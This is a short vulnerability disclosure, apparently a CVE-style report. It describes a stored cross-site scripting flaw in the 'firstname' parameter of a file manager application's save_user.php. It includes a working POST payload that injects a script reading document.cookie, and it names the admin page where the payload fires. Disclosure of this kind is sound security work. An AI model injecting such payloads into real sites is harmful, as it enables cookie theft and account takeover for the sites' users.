BUG_Author: HaolunSong
Vulnerability File: /file_manager/admin/save_user.php
Parameter "firstname" (POST), exists stored cross-site scripting vulnerability
Payload:status=normal&emplnumber=2&firstname=<script>alert(document.cookie)</script>&lastname=3®ion=zanzibar
Payload will trigger when a user visits on http://localhost/file_manager/admin/admin_user.php

